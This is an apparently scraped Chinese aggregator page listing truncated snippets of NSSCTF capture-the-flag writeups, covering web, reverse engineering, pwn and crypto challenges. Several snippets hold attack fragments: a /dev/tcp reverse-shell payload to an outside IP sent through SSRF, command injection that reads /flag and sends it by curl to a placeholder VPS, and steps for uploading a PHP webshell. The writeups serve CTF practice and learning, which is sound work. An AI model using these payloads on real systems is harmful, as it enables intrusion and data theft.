E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
nssctf
NSSCTF
RE [NSSRound#3 Team]jump_by_jump_revenge
##花指令第一次尝试做花指令的题目ida反汇编出现jumpout(xxx)判断是花指令找到花指令(标红)选中按D转化为数据,再将数据改成0x90h(即nop)再按c转数据化为nop然后按P(重新分析)+F5写个脚本逆回去就行了
杨天yangtian
·
2023-11-01 04:47
网络安全
NSSCTF
Round#6 WP
NSSCTFRound#6check(V1)#-*-coding:utf-8-*-fromflaskimportFlask,requestimporttarfileimportosapp=Flask(__name__)app.config['UPLOAD_FOLDER']='./uploads'app.config['MAX_CONTENT_LENGTH']=100*1024ALLOWED_EXT
Y3g@d
·
2023-11-01 04:43
Write
Up
python知识
flask
python
后端
NSSCTF
2nd Web 题目复现
php签到考点:1.上传表单html的编写2./.绕过黑名单(在Linux系统下1.php.是一个合法的文件名,系统不会自动把最后的点去掉并把文件当成php文件执行,所以点绕过只在Windows下有用)源代码:FileUploadFormFileUploadFormSelectafile:然后上传一个php文件后缀改为.php/.(/.最好用url编码)然后上传成功即可连shell或者rce这里介
文大。
·
2023-10-31 03:28
web安全
NSSCTF
web刷题记录3
文章目录[护网杯2018]easy_tornado[NSSRound#VTeam]PYRCE方法一cp命令方法二tar命令[CISCN2019华东南]Web4[CISCN2023华北]ez_date[GWCTF2019]你的名字[GKCTF2020]ez三剑客-easynode[NSSRound#8Basic]Upload_gogoggo[护网杯2018]easy_tornado打开题目,发现有三
Sx_zzz
·
2023-10-31 03:23
刷题记录
前端
web安全
php
python
学习
[
NSSCTF
2nd] web刷题记录
文章目录php签到MyBox非预期解预期解php签到源代码编辑html,将上述代码复制到处即可得到上传文件功能然后上传名为1.php的一句话木马,bp抓包修改后缀为1.php/.(这里我再次测试1.php.,发现上传不成功)上传成功后,访问./1.php/或./1.php得到flagMyBox考点:ssrf,ApacheHTTPServer路径穿越漏洞,反弹shell非预期解直接读取环境变量/?u
Sx_zzz
·
2023-10-31 03:49
刷题记录
前端
学习
web安全
node.js
php
python
CTF Reverse逆向学习之SMC动态代码加密技术,题目复现(
NSSCTF
)([网鼎杯 2020 青龙组]jocker)
SMC简介SMC,即SelfModifyingCode,动态代码加密技术,指通过修改代码或数据,阻止别人直接静态分析,然后在动态运行程序时对代码进行解密,达到程序正常运行的效果。SMC的实现方式有很多种,可以通过修改PE文件的SectionHeader、使用APIHook实现代码加密和解密、使用VMProtect等第三方加密工具等。关于具体的实现方式可以参考合天的文章:探究SMC局部代码加密技术以
Sciurdae
·
2023-10-27 00:57
网络安全
密码学
安全
NSS [SWPUCTF 2022 新生赛]numgame
view-source:查看源码解码之后是一个路由/
NsScTf
.php,访问一下得到了真正的源码。
Jay 17
·
2023-10-26 05:44
CTF-web(零散wp合集)
web安全
PHP
面向对象
NSSCTF
做题第9页(3)
[GKCTF2020]CheckIN代码审计这段代码定义了一个名为ClassName的类,并在脚本的最后创建了一个ClassName类的实例。在ClassName类的构造函数中,首先通过调用$this->x()方法获取了请求参数$_REQUEST中的值,并将其赋值给$this->code属性。接下来,使用base64_decode()函数对$this->code进行解码,将解码后的结果赋值给$th
呕...
·
2023-10-26 03:51
java
前端
javascript
[MoeCTF 2022] PWN复现
ret2textret2libcrop32rop64filedesendianborderbufferoverflowbabyfmtrandomret2text发生了明显的溢出,并且也发现了有后面函数,可以直接溢出,exp如下:frompwnimport*io=remote('node1.anna.
nssctf
.cn
Xzzzz911
·
2023-10-26 01:29
PWN
网络安全
NSSCTF
第九页(1)
这里过滤了双大括号,只能用{%%}这道题的考点没有{{情况下如何构造回显如何绕过字符串过滤过滤器的熟悉程度看大佬的wp才知道这道题怎么做因为.和[]被过滤,所以使用flask的|attr来调用方法推荐去看
nssctf
呕...
·
2023-10-25 13:33
1024程序员节
NSSCTF
做题第9页(2)
[SWPUCTF2022新生赛]ez_1zpopimpo=newdxg;}function__wakeup(){$this->impo=newdxg;return$this->impo->fmm();}function__toString(){if(isset($this->impo)&&md5($this->md51)==md5($this->md52)&&$this->md51!=$this-
呕...
·
2023-10-25 13:24
做题
NSSCTF
2nd WEB
php签到考点文件上传,绕过题目&/dev/tcp/120.46.41.173/90230>&1'"""#注意后面一定要有回车,回车结尾表示http请求结束。tmp=urllib.parse.quote(payload)new=tmp.replace('%0A','%0D%0A')result='mybox://127.0.0.1:80/'+'_'+newresult=urllib.parse.q
ytl_storm
·
2023-10-23 20:09
NSSCTF
web安全
NSSCTF
第8页(1)
ClassicChildhoodGamejs代码审计,找关键语句,发现event.js里边东西是最多的找到了通关语句他下边应该是就关键代码了,有一串16进制代码解出来是base64,接着解两次base64解码,就得到了flag,把前缀换成
NSSCTF
呕...
·
2023-10-23 20:38
java
前端
javascript
nssctf
2nd crypto
nssctf
2ndsummary:利用pinvqinv分解n;利用多组e,c,恢复n差一题,格真不会啊….盯着看一天,痛苦啊EzRSA题目fromCrypto.Util.numberimport*fromsecretimportflagm
miao-25
·
2023-10-23 20:32
比赛复现
python
算法
开发语言
NSSCTF
第8页(2)
[LitCTF2023]就当无事发生没有环境[MoeCTF2022]ezhtml在js代码找到了flag[HNCTF2022WEEK2]ez_ssrf题目描述说让我们访问index.php,看到了代码传入的data会base64解码,传参port和host,还有一个没见过的函数fsockopen查了一下fsockopen函数可以被滥用来触发SSRF攻击,这是因为该函数允许从远程服务器上读取数据并与
呕...
·
2023-10-23 20:55
android
NSSCTF
Round#12 Basic—Bulbasaur
NSSCTF
平台:https://www.
nssctf
.cn/PS:记得所有的flag都改为NSSCTFBulbasaur:文件给了一个妙蛙种子图,和一个压缩包把所有的方法基本都试了才发现是盲水印(题目做太少了
落寞的魚丶
·
2023-10-22 15:44
NSSRound#12
Basic
Misc
Bulbasaur
NSSCTF
做题(10)
叫10好听一点,就是补9的第7页的内容[SWPUCTF2022新生赛]ez_sqlget传参说是不安全,那就只能用post了有回显了,两个假的flag发现万能密码1'or1=1#变成了1=1#1=1#11=1#=1#1=1#1=1#发现or和空格都无了,union也过滤空格可以用/**/来代替,union可以双写绕过知道了大概的过滤,就直接开注nss=2'/**/ununionion/**/sel
呕...
·
2023-10-19 20:48
java
开发语言
[CTF]SCTF2021 WEB复现(详细版)
前言认真复现还是收获挺多的,做这些就算看wp也会卡很久的题目才容易提高.最后感谢下
NSSCTF
平台提供的靶机,虽然flag只有一半Loginme下载附件得到源码,题目让我们本地访问,也就是要伪造ip,但是是有检测的
Sapphire037
·
2023-10-18 03:23
CTF
前端
安全
web安全
NSSCTF
做题(9)
[GDOUCTF2023]看见输入框而且有提示说是ssti注入输入{{7*7}}试试,发现报错输入{%%}发现了是jinja2模板找到关键函数PythonSSTI利用jinja过滤器进行Bypass·ph0ebus'sBlog原理见这篇文章,这里直接给出payload{%setnine=dict(aaaaaaaaa=a)|join|count%}{%setnine=dict(aaaaaaaaa=a
呕...
·
2023-10-15 17:32
前端
NSSCTF
做题(8)
[SWPUCTF2022新生赛]js_sign看到了js代码有一个base64编码,解密最后发现这是一个加密方式去掉空格之后得到了flagNSSCTF{youfindflagbytapcode}[MoeCTF2022]baby_file提示说有一个秘密看看你能不能找到输入?file=secret出现报错输入php伪协议读取index.php?file=php://filter/convert.ba
呕...
·
2023-10-12 16:31
android
ZTJL2
Do_you_know_http抓包看看使用本地,抓包后修改就可以了,再次访问新的地址就可以了X-Forwarded-For:127.0.0.1importrequestsurl='http://node1.anna.
nssctf
.cn
@阿奕
·
2023-10-11 15:53
前端
网络
NSSCTF
RCE模块
文章目录[SWPUCTF2021新生赛]hardrce[SWPUCTF2022新生赛]ez_rce[SWPUCTF2021新生赛]finalrce[NISACTF2022]middlerce[SWPUCTF2021新生赛]hardrce_3[UUCTF2022新生赛]ez_rce[NSSRound#4SWPU]ez_rce[GKCTF2021]easycms目录穿越任意文件读取[SWPUCTF20
去选择自己的路
·
2023-10-11 15:19
php
web安全
网络安全
NSSCTF
[SWPUCTF 2021 新生赛]hardrce(无字母RCE)
代码审计:使用get方式请求给wllm传参使用preg_match函数正则匹配过滤掉了一些符号'\t','\r','\n','\+','\[','\^','\]','\"','\-','\$','\*','\?','\','\=','\`'以及[a-zA-Z]即所有的大小写字母如果传入内容满足这些条件则会执行eval函数URL编码取反绕过正则实现RCE:直接传入肯定不行此时我们可以对需要使用的函数
kali-Myon
·
2023-10-11 15:09
PHP
web
CTF
WAF绕过
php
正则表达式
web安全
rce
NSSCTF
做题(7)
[第五空间2021]pklovecloud反序列化cinder=newpkshow;}function__toString(){if(isset($this->cinder))return$this->cinder->echo_name();}}classace{public$filename;public$openstack;public$docker;functionecho_name(){$
呕...
·
2023-10-10 15:46
android
[LitCTF 2023]作业管理系统 - 文件上传+弱口令
[LitCTF2023]作业管理系统解题流程解题流程1、F12看到页面源代码有注释:默认账户adminadmin使用:admin-admin可直接登录2、上传一句话木马3、蚁剑连接找flag=
NSSCTF
Hillain
·
2023-10-10 04:38
CTF-WEB
web安全
安全
ctf
文件上传
弱口令
2023 10月2日 至 10 月8日学习总结
学了半天想了还是需要进行个总结1.做的题目
NSSCTF
[BJDCTF2020]easy_md5md5实现sql-CSDN博客[网鼎杯2020白虎组]PicDownpython反弹shellproc/self
双层小牛堡
·
2023-10-09 14:51
周总结
学习
NSSCTF
——(详细解析)[BJDCTF 2020]easy_md5
1.打开之后是一个查询框看到标签有SQL注入,宽字节,尝试sql注入测试;测试了半天一点反应都没有2.抓包查看也没有什么特别的地方,burp模拟发包,看到:HTTP/1.1200OKServer:nginx/1.18.0Date:Tue,18Jul202311:19:58GMTContent-Type:text/html;charset=UTF-8Connection:closeX-Powered
陈金默_b0mT
·
2023-10-08 14:41
网络安全
绕过MD5以及MD5碰撞
我们以
nssctf
上的一道题为例BJDCTF2020]easy_md5打开题目,我们尝试一下万能密码,SQL注入都不行然后我们就抓包,或者是F12看看响应头里面有什么F12之后我们就发现响应头里面有sql
@阿奕
·
2023-10-08 14:41
php
NSSCTF
[BJDCTF 2020]easy_md5 md5实现sql
开局一个框啥都没有用然后我们进行抓包发现存在提示这里是一个sql语句看到了是md5加密后的这里也是看了wp才知道特殊MD5可以被识别为注入的万能钥匙ffifdyopmd5加密后是276F722736C95D99E921722CF9ED621C转变为字符串后是'or'6乱码这里就可以实现注入所以我们传递password=ffifdyop进入看看发现不需要。。直接访问后面php即可
双层小牛堡
·
2023-10-08 14:07
NSSCTF
php
CTF-MISC取证专项练习(更新ing)
目录来源:
NSSCTF
蓝帽杯2022初赛计算机取证_1计算机取证_2计算机取证_3计算机取证_4网站取证_1网站取证_2网站取证_3网站取证_4手机取证_1手机取证_2来源:
NSSCTF
蓝帽杯2022初赛计算机取证
nH0pe
·
2023-10-04 11:53
2022CTF
笔记
学习
NSSCTF
做题(6)
[HCTF2018]Warmup查看源代码得到开始代码审计"source.php","hint"=>"hint.php"];if(!isset($page)||!is_string($page)){echo"youcan'tseeit";returnfalse;//page变量不存在或page变量不是字符串时返回false}if(in_array($page,$whitelist)){return
呕...
·
2023-10-01 15:51
android
java
开发语言
NSSCTF
的一部分题的萌新的我的思路:MISC篇(持续更新)
系列文章目录太长啦懒得列了文章目录系列文章目录前言338:[长城杯2021院校组]签到47:[SWPU2020]套娃2049:[NISACTF2022]huaji?2591:[HUBUCTF2022新生赛]最简单的misc693:[BJDCTF2020]签个到?2053:[NISACTF2022]normal1991:[NISACTF2022]为什么我什么都看不见699:[BJDCTF2020]j
超大青花鱼
·
2023-10-01 06:46
CTF
WriteUp
学习
NSSCTF
ezMath
第一次接触这种题记录一下,一道
NSSCTF
上的题,当时没做出来,拿来复现一下本题考查:sha256爆破、pwntools打开环境,点进网址,出现下图看到个sha256与XXXX之间的联系,需要求出XXXX
L00cback
·
2023-10-01 06:45
ctf
python
NSSCTF
roundX-Integer part的wp
emmmm,不知道为什么没有人做这道题。呜呜呜,出题人感觉被暴打了(题目思路的来源是某培训机构的测试题,把堆栈dump下来,让学员分析里面的信息然后我把flag藏在了参数里面,为了不显示出来,我搞成了float类型。可能改成float型的话,大家看见这一堆垃圾数据,就不知道该怎么想了(bushi题目如下:在里面找出flag0x0137F3E40137f5c000e01023010620000000
逆向技术分享
·
2023-10-01 06:14
CTF
NSSCTF
题库[LitCTF]系列
导言自己给自己做的笔记,给自己复习用的。所有的环境习惯先用burp自带浏览器打开。肯定写的不好,也不知道以后会不会改。0x01[LitCTF2023]导弹迷踪首先进入环境是这么一个画面,没人会尝试直接通关的吧(?)可以看到此环境之中没有什么直接的对话框或者线索我们尝试着打开源码,看看通关的条件源码里面找到game.js的文件然后往下翻,看看通关第十关是什么意思可以找到这个finsh的命令里面这个f
J1ng_Hong
·
2023-10-01 06:43
网络安全
web安全
NSSCTF
-HDCTF2023-Yami题解记录
WEB上周六无意看到有个比赛,本菜鸡参加学习了下,也没有做出几道题目,第一次做个记录push下自己,向大佬学习Orz【YamiYami】题目链接考察点->【python伪随机数、Pyyaml反序列化、Session伪造、任意文件读取】进入题目:whatweb看一下:有三个功能,访问看看:1、Readsomethings2、Uploadfile3、pwd这么明显,尝试任意文件读取,读取源码app.p
LeBRONY
·
2023-10-01 06:43
ctf-wp
flask
python
网络安全
web安全
NSSCTF
做题(5)
[
NSSCTF
2022SpringRecruit]babyphp代码审计if(isset($_POST['a'])&&!
呕...
·
2023-10-01 06:12
前端
linux
算法
NSSCTF
做题(4)
[NISACTF2022]checkin简单的一道代码审计了但是发现传参传不上去后来发现在选中nisactf的时候,注释里面的内容也被标记了不知道是为什么,把它复制到010里边去看看发现了不对的地方nisactf应该传参根据这个进行url编码我们选择实际的参名和字符串,并转为url编码格式(每两位前加%)最后构造的payload/?ahahahaha=jitanglailo&%E2%80%AE%E
呕...
·
2023-09-30 08:42
javascript
NSSCTF
做题
[第五空间2021]WebFTP打开题目发现是登录的界面用admin和password试一下发现不行用dirsearch扫一下发现了git泄露但是用githack下载不下来文件去网上查了一下webftp发现是一个在线php文件管理系统WebFTP——在线FTP工具:强大的PHP在线文件管理系统-時日在这篇博客中提到,引用一下发现能直接登录phpinfo.php拿到flag[SWPUCTF2021新
呕...
·
2023-09-28 07:43
NSSCTF
php
sql
[鹤城杯 2021]EasyP
题目可在
NSSCTF
平台复现:
NSSCTF
这是一个恶心的题,恶心到做过的人也不愿意把wp写的细化,看了一圈wp发现基本都只给个payload,细节什么的也基本没写,让人摸不着头脑。我来讲讲吧!!
errorr0
·
2023-09-28 07:09
刷题+WP
安全
web安全
php
后端
NSSCTF
做题(3)
[鹤城杯2021]EasyP代码审计解析:通过include'utils.php';语句引入了一个名为utils.php的外部文件,该文件可能包含一些辅助函数或变量。当通过POST请求提交了名为guess的表单参数时,代码会执行以下逻辑:将$_POST['guess']的值转换为字符串,并赋给变量$guess。如果$guess的值与一个名为$secret的变量的值相等,那么会将一个包含"Congr
呕...
·
2023-09-28 07:35
java
服务器
数据库
[陇剑杯2021] 复现
(如有字母请全部使用小写,填写样例:http、dns、ftp)
NSSCTF
{http}jwt-1昨天,单位流量系统捕获了黑客攻击流量,请您分析流量后进行回答:该网站使用了______认证方式。
ThnPkm
·
2023-09-24 17:03
刷题
wp
服务器
运维
nssctf
刷题
[ZJCTF2019]NiZhuanSiWei".file_get_contents($text,'r')."";if(preg_match("/flag/",$file)){echo"Notnow!";exit();}else{include($file);//useless.php$password=unserialize($password);echo$password;}}else{hig
葫芦娃42
·
2023-09-24 07:39
php
NSSCTF
Round#7部分wp
Webec_RCE源码:啥都没过滤,直接拼接就行payload1action=;cat/flag2action=;curlvpsip:port/`cat/flag`0o0参考链接:谈一谈php://filter的妙用目录扫描发现.DS_Store泄露,使用ds_store_exp发现存在Ns_SCtF.phpNs_SCtF.php';$real_name=fopen($file_name,"w")
v2ish1yan
·
2023-09-24 07:38
CTF
WEB
php
NSSCTF
刷题记录
本篇文章主要写几个值得记一笔的题目,其他题目都是类似换皮。[HNCTF2022Week1]ezcmp正如题目所说,题目的大概意思是要我们使用gdb进行调试。Checksec&IDA就开启了NXint__cdeclmain(intargc,constchar**argv,constchar**envp){charbuf[32];//[rsp+0h][rbp-50h]BYREFcharsrc[44];
Red-Leaves
·
2023-09-24 07:08
Pwn
linux
python
网络安全
网络
学习
NSSCTF
刷题记录
[NISACTF2022]popchains(不会)打开题目,存在unserialize函数,则涉及反序列化相关。查看代码:HappyNewYear~MAKEAWISH';if(isset($_GET['wish'])){@unserialize($_GET['wish']);}else{$a=newRoad_is_Long;highlight_file(__FILE__);}/*********
kindyyy
·
2023-09-24 07:08
安全
NSSCTF
2022部分WP
misc王八快跑首先下载附件,咱也不知道考啥运行文件,发现有一只乌龟,一直点跑,乌龟就可以跑乌龟跑到终点即可获得flag,原来是一道签到题搬好小板凳听故事老规矩,下载福建一串字符串,猜测是base64编码格式拿到base64解码里解码得,可以看到flag,但是flag貌似是加密的,观察flag的编码形式,只含有字母,数字0-9,还有等号,猜测是base16解码得,拿下!nextmeet只有个网址,
猫巷_与你
·
2023-09-24 07:38
NSSCTF
网络安全
NSSCTF
PWN方向刷题记录
[NISACTF2022]UAFfrompwnimport*context.log_level='DEBUG'#io=process('./pwnuaf')io=remote('1.14.71.254',28905)elf=ELF('./pwnuaf')def_add_note():io.recvuntil(":")io.sendline("1")def_edit_note(id,content)
CyhStyrl
·
2023-09-24 07:07
网络安全
NSSCTF
逆向刷题记录
目录[LitCTF2023]enbase64[GDOUCTF2023]Check_Your_Luck[HUBUCTF2022新生赛]help[HNCTF2022Week1]X0r[LitCTF2023]snake[SWPUCTF2022新生赛]xor[WUSTCTF2020]level1[LitCTF2023]enbase64qmemcpy(&Source[1],&table[-(Source-&
fivesheeptree
·
2023-09-24 07:07
CTF逆向刷题记录
java
前端
javascript
[SWPU CTF]之Misc篇(
NSSCTF
)刷题记录⑥
NSSCTF
-Misc篇-[SWPUCTF][长城杯2021院校组]签到[巅峰极客2021]签到[羊城杯2021]签到题[鹤城杯2021]流量分析[SWPU2019]神奇的二维码[NISACTF2022
落寞的魚丶
·
2023-09-24 07:06
CTF
CTF
NSSCTF
[SWPU
CTF]
Misc
CTF刷题记录
上一页
1
2
3
4
5
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他